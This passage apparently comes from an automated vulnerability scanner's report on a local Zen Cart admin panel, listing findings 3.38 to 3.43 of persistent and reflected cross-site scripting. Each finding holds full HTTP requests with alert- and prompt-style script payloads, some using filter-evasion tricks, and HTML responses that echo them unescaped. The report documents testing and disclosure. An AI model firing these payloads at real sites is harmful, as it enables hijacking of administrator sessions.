        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">test        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.66027)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" /><input type="hidden" name="products_date_added" value="2015-08-25 18:42:30" /><input type="hidden" name="master_category" value="1" /><input type="hidden" name="master_c



Finding 3.38:  Cross-Site Scripting. Persistent XSS found in current scan.

Current injection value: '"--></style></sCriPt><sCriPt>alert(14405309.69287)</sCriPt>

Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=javascript:&attribute_page=1&products_filter=3
Injected item: GET+POST : action
Injection value: javascript:

Reflection URI: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1
Detection string: prompt(14405309.69347)


HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------76712324410
Content-Length: 4930

-----------------------------76712324410
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------76712324410
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------76712324410
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------76712324410
Content-Disposition: form-data; name="master_category"

1
-----------------------------76712324410
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------76712324410
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------76712324410
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------76712324410
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------76712324410
Content-Disposition: form-data; name="products_status"

0
-----------------------------76712324410
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------76712324410
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------76712324410
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------76712324410
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------76712324410
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------76712324410
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------76712324410
Content-Disposition: form-data; name="products_price"

12
-----------------------------76712324410
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------76712324410
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------76712324410
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------76712324410
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------76712324410
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------76712324410
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------76712324410
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------76712324410
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------76712324410
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------76712324410
Content-Disposition: form-data; name="products_model"

testval
-----------------------------76712324410
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------76712324410
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------76712324410
Content-Disposition: form-data; name="image_delete"

0
-----------------------------76712324410
Content-Disposition: form-data; name="overwrite"

1
-----------------------------76712324410
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------76712324410
Content-Disposition: form-data; name="products_weight"

0
-----------------------------76712324410
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------76712324410
Content-Disposition: form-data; name="search"

test
-----------------------------76712324410
Content-Disposition: form-data; name="x"

0
-----------------------------76712324410
Content-Disposition: form-data; name="y"

0
-----------------------------76712324410
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------76712324410
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------76712324410
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------76712324410
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------76712324410
Content-Disposition: form-data; name="products_description[1]"

'"--></style></sCriPt><sCriPt>alert(14405309.69287)</sCriPt>
-----------------------------76712324410
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------76712324410
Content-Disposition: form-data; name="products_image"

3ds/25
-----------------------------76712324410
Content-Disposition: form-data; name="search"

test
-----------------------------76712324410--



HTTP Response 
----Truncated due to large size ---

<tr>
            <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr class="dataTableHeadingRow">
                <td class="dataTableHeadingContent" width="20" align="right">ID</td>
                <td class="dataTableHeadingContent">Categories / Products</td>
                <td class="dataTableHeadingContent" align="left">Model</td>
                <td class="dataTableHeadingContent" align="right">Price/Special/Sale</td>
                <td class="dataTableHeadingContent" align="right">&nbsp;</td>
                <td class="dataTableHeadingContent" align="right">Quantity&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableHeadingContent" width="50" align="center">Status</td>
                <td class="dataTableHeadingContent" align="right">Sort</td>
                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test'">
                <td class="dataTableContent" width="20" align="right">1</td>
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&pID=1&action=new_product_preview&read=only&product_type=1&page=1"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbsp;<sVg/OnLOaD=prompt(14405309.69347)></td>
                <td class="dataTableContent">testval</td>
                <td colspan="2" class="dataTableContent" align="right">$12.00</td>
                <td class="dataTableContent" align="right">1222110</td>
                <td class="dataTableContent" width="50" align="left">
<form name="setflag_products" action="http://localhost:8081/zen-cart/admin1/categories.php?action=setflag&pID=1&cPath=1&page=1&search=test" method="post"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />        <input type="image" src="images/icon_red_on.gif" title="Status - Disabled"/>
        <input type="hidden" name="flag" value="1" />
        </form>
&nbsp;&nbsp;<img src="images/icon_yellow_on.gif" border="0" alt="Product is Linked" title=" Product is Linked "><br>                </td>
                <td class="dataTableContent" align="right">0</td>
                <td class="dataTableContent" align="right">


Finding 3.39:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: metatags_keywords[2]
Injection value: <script>alert(14405309.20447)</script>
Detection value: <script>alert(14405309.20447)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview_meta_tags&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=2&action=new_product_meta_tags
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------272002940131886
Content-Length: 1932

-----------------------------272002940131886
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_products_name_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_model_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_price_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_tagline_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[2]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[2]"

<script>alert(14405309.20447)</script>
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[2]"

Default text
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[1]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[1]"

Passwor1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[1]"

Default text
-----------------------------272002940131886
Content-Disposition: form-data; name="products_model"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------272002940131886
Content-Disposition: form-data; name="x"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="y"

0
-----------------------------272002940131886--



HTTP Response
----Truncated due to large size ---
 
      <td class="main" valign="top">
              <img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;<strong>Products Name:</strong>&nbsp;            </td>
            <td class="main" valign="top">
               <strong>Products Model:</strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>
            <td class="main" valign="top">
               <strong>Price:</strong>&nbsp;$12.00            </td>
            <td class="main" valign="top">
               <strong><strong>Title/Tagline:</strong></strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>

          <tr>
            <td class="main" valign="top"><strong>Meta Tag Title:</strong>&nbsp;</td>
            <td class="main" colspan="3"><span class="alert">EXCLUDED</span></td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Keywords:</strong>&nbsp;</td>
            <td class="main" colspan="3"><script>alert(14405309.20447)</script></td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Description:</strong>&nbsp;</td>
            <td class="main" colspan="3">Default text</td>
          </tr>
        </table></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="3" cellspacing="4" cellpadding="6">
            <td class="main" valign="top">
              <img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;<strong>Products Name:</strong>&nbsp;admin            </td>
            <td class="main" valign="top">
               <strong>Products Model:</strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>
            <td class="main" valign="top">
               <strong>Price:</strong>&nbsp;$12.00            </td>
            <td class="main" valign="top">
               <strong><strong>Title/Tagline:</strong></strong>&nb



Finding 3.40:  Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection.

Injected item: POST: metatags_description[2]
Injection value: <script>alert(14405309.20457)</script>
Detection value: <script>alert(14405309.20457)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview_meta_tags&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=2&action=new_product_meta_tags
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------272002940131886
Content-Length: 1928

-----------------------------272002940131886
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_products_name_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_model_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_price_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_tagline_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[2]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[2]"

Passwor1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[2]"

<script>alert(14405309.20457)</script>
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[1]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[1]"

Passwor1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[1]"

Default text
-----------------------------272002940131886
Content-Disposition: form-data; name="products_model"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------272002940131886
Content-Disposition: form-data; name="x"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="y"

0
-----------------------------272002940131886--



HTTP Response
----Truncated due to large size ---
 
rong>Products Name:</strong>&nbsp;            </td>
            <td class="main" valign="top">
               <strong>Products Model:</strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>
            <td class="main" valign="top">
               <strong>Price:</strong>&nbsp;$12.00            </td>
            <td class="main" valign="top">
               <strong><strong>Title/Tagline:</strong></strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>

          <tr>
            <td class="main" valign="top"><strong>Meta Tag Title:</strong>&nbsp;</td>
            <td class="main" colspan="3"><span class="alert">EXCLUDED</span></td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Keywords:</strong>&nbsp;</td>
            <td class="main" colspan="3">Passwor1</td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Description:</strong>&nbsp;</td>
            <td class="main" colspan="3"><script>alert(14405309.20457)</script></td>
          </tr>
        </table></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="3" cellspacing="4" cellpadding="6">
            <td class="main" valign="top">
              <img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;<strong>Products Name:</strong>&nbsp;admin            </td>
            <td class="main" valign="top">
               <strong>Products Model:</strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>
            <td class="main" valign="top">
               <strong>Price:</strong>&nbsp;$12.00            </td>
            <td class="main" valign="top">
               <strong><strong>Title/Tagline:</strong></strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>

          <tr>
            <td class="main" valign="top"><strong>Meta Tag Title:</strong>&nbsp;</td>
            <td class="m


Finding 3.41:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: metatags_description[1]
Injection value: <script>alert(14405309.20497)</script>
Detection value: <script>alert(14405309.20497)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview_meta_tags&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=2&action=new_product_meta_tags
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------272002940131886
Content-Length: 1928

-----------------------------272002940131886
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_products_name_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_model_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_price_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_tagline_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[2]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[2]"

Passwor1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[2]"

Default text
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[1]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[1]"

Passwor1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[1]"

<script>alert(14405309.20497)</script>
-----------------------------272002940131886
Content-Disposition: form-data; name="products_model"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------272002940131886
Content-Disposition: form-data; name="x"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="y"

0
-----------------------------272002940131886--



HTTP Response
----Truncated due to large size ---
 
Products Name:</strong>&nbsp;admin            </td>
            <td class="main" valign="top">
               <strong>Products Model:</strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>
            <td class="main" valign="top">
               <strong>Price:</strong>&nbsp;$12.00            </td>
            <td class="main" valign="top">
               <strong><strong>Title/Tagline:</strong></strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>

          <tr>
            <td class="main" valign="top"><strong>Meta Tag Title:</strong>&nbsp;</td>
            <td class="main" colspan="3"><span class="alert">EXCLUDED</span></td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Keywords:</strong>&nbsp;</td>
            <td class="main" colspan="3">Passwor1</td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Description:</strong>&nbsp;</td>
            <td class="main" colspan="3"><script>alert(14405309.20497)</script></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" /><input type="hidden" name="metatags_products_name_status" value="1" /><input type="hidden" name="metatags_title_status" value="0" /><input type="hidden" name="metatags_model_status" value="0" /><input type="hidden" name="metatags_price_status" value="1" /><input type="hidden" name="metatags_title_tagline_status" value="0" /><input type="hidden" name="products_model" value="testval" /><input type="hidden" name="products_price_sorter" value="12.0000" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input type="hidden" name="metatags_title[2]" value="testval" /><input type="hidden" name="metatags_keywords[2]" value="Passwor1" /><input type="hidden" name="metatags_description[2]" value="Default text" /><input type="hidden" name="metatags_title[1]" value="test



Finding 3.42:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: metatags_keywords[1]
Injection value: <script>alert(14405309.20507)</script>
Detection value: <script>alert(14405309.20507)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview_meta_tags&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=2&action=new_product_meta_tags
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------272002940131886
Content-Length: 1932

-----------------------------272002940131886
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_products_name_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_model_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_price_status"

1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title_tagline_status"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[2]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[2]"

Passwor1
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[2]"

Default text
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_title[1]"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_keywords[1]"

<script>alert(14405309.20507)</script>
-----------------------------272002940131886
Content-Disposition: form-data; name="metatags_description[1]"

Default text
-----------------------------272002940131886
Content-Disposition: form-data; name="products_model"

testval
-----------------------------272002940131886
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------272002940131886
Content-Disposition: form-data; name="x"

0
-----------------------------272002940131886
Content-Disposition: form-data; name="y"

0
-----------------------------272002940131886--

HTTP Response
----Truncated due to large size ---

 <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="3" cellspacing="4" cellpadding="6">
            <td class="main" valign="top">
              <img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;<strong>Products Name:</strong>&nbsp;admin            </td>
            <td class="main" valign="top">
               <strong>Products Model:</strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>
            <td class="main" valign="top">
               <strong>Price:</strong>&nbsp;$12.00            </td>
            <td class="main" valign="top">
               <strong><strong>Title/Tagline:</strong></strong>&nbsp;<span class="alert">EXCLUDED</span>            </td>

          <tr>
            <td class="main" valign="top"><strong>Meta Tag Title:</strong>&nbsp;</td>
            <td class="main" colspan="3"><span class="alert">EXCLUDED</span></td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Keywords:</strong>&nbsp;</td>
            <td class="main" colspan="3"><script>alert(14405309.20507)</script></td>
          </tr>
          <tr>
            <td class="main" valign="top"><strong>Meta Tag Description:</strong>&nbsp;</td>
            <td class="main" colspan="3">Default text</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" /><input type="hidden" name="metatags_products_name_status" value="1" /><input type="hidden" name="metatags_title_status" value="0" /><input type="hidden" name="metatags_model_status" value="0" /><input type="hidden" name="metatags_price_status" value="1" /><input type="hidden" name="metatags_title_tagline_status" value="0" /><input type="hidden" name="products_model" value="testval" /><input type="hidden" name="products_price_sorter" value="12.0000" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input type="hidden" name="metatags_title[2]" value="testval" /><input type="hidden" name="metatags_keywords[2]" value="Passwor1" /><input type="hidden" name="metatags_description[2]" value="Default text" /><input type="hidden" name="metatags_title[1]" value="testval" />

Finding 3.43: Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[1]
Injection value: <script>alert(14515090.16657)</script>
Detection value: <script>alert(14515090.16657)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=new_product
Cookie: zenAdminID=h0ro03kt8iei0mbcu4kviq7pn2
Content-Type: multipart/form-data; boundary=---------------------------18630105114717
Content-Length: 4408

-----------------------------18630105114717
Content-Disposition: form-data; name="securityToken"

6dead581bdfe002d6b2ac17b640835d1
-----------------------------18630105114717
Content-Disposition: form-data; name="products_date_added"

2015-12-30 23:01:06
-----------------------------18630105114717
Content-Disposition: form-data; name="x"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="y"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="master_categories_id"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_price_sorter"

0.0000
-----------------------------18630105114717
Content-Disposition: form-data; name="products_status"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_date_available"

12/30/2015
-----------------------------18630105114717
Content-Disposition: form-data; name="manufacturers_id"


-----------------------------18630105114717
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------18630105114717
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------18630105114717
Content-Disposition: form-data; name="products_price"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------18630105114717
Content-Disposition: form-data; name="products_qty_box_status"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity_mixed"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_description[1]"

<script>alert(14515090.16657)</script>
-----------------------------18630105114717
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------18630105114717
Content-Disposition: form-data; name="products_model"

testval
-----------------------------18630105114717
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------18630105114717
Content-Disposition: form-data; name="products_previous_image"


-----------------------------18630105114717
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------18630105114717
Content-Disposition: form-data; name="image_delete"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="overwrite"

1
-----------------------------18630105114717
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------18630105114717
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------18630105114717
Content-Disposition: form-data; name="products_weight"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------18630105114717
Content-Disposition: form-data; name="products_date_added"

2015-12-30 23:01:06
-----------------------------18630105114717--

HTTP Response

HTTP/1.1 200 OK
Date: Wed, 30 Dec 2015 23:09:56 GMT
Server: Apache
X-Powered-By: PHP/5.4.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Zen Cart!</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<link rel="stylesheet" type="text/css" href="includes/cssjsmenuhover.css" media="all" id="hoverJS">
<script language="javascript" src="includes/menu.js"></script>
<script language="javascript" src="includes/general.js"></script>
<script type="text/javascript">
  <!--
  function init()
  {
    cssjsmenu('navbar');
    if (document.getElementById)
    {
      var kill = document.getElementById('hoverJS');
      kill.disabled = true;
    }
if (typeof _editor_url == "string") HTMLArea.replaceAll();
 }
 // -->
</script>
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="init()">
<div id="spiffycalendar" class="text"></div>
<!-- header //-->
<!-- All HEADER_ definitions in the columns below are defined in includes/languages/english.php //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="header">
  <tr>
    <td align="left" valign="top" height="70px" width="200px"><a href="http://localhost:8081/zen-cart/admin1/index.php"><img src="images/logo.gif" border="0" alt="Admin Powered by Zen Cart :: The Art of E-Commerce" title=" Admin Powered by Zen Cart :: The Art of E-Commerce "></a></td>
    <td colspan="2" align="left"><table width="100%"><tr>
    <td align="left" class="main" valign="top"></td>
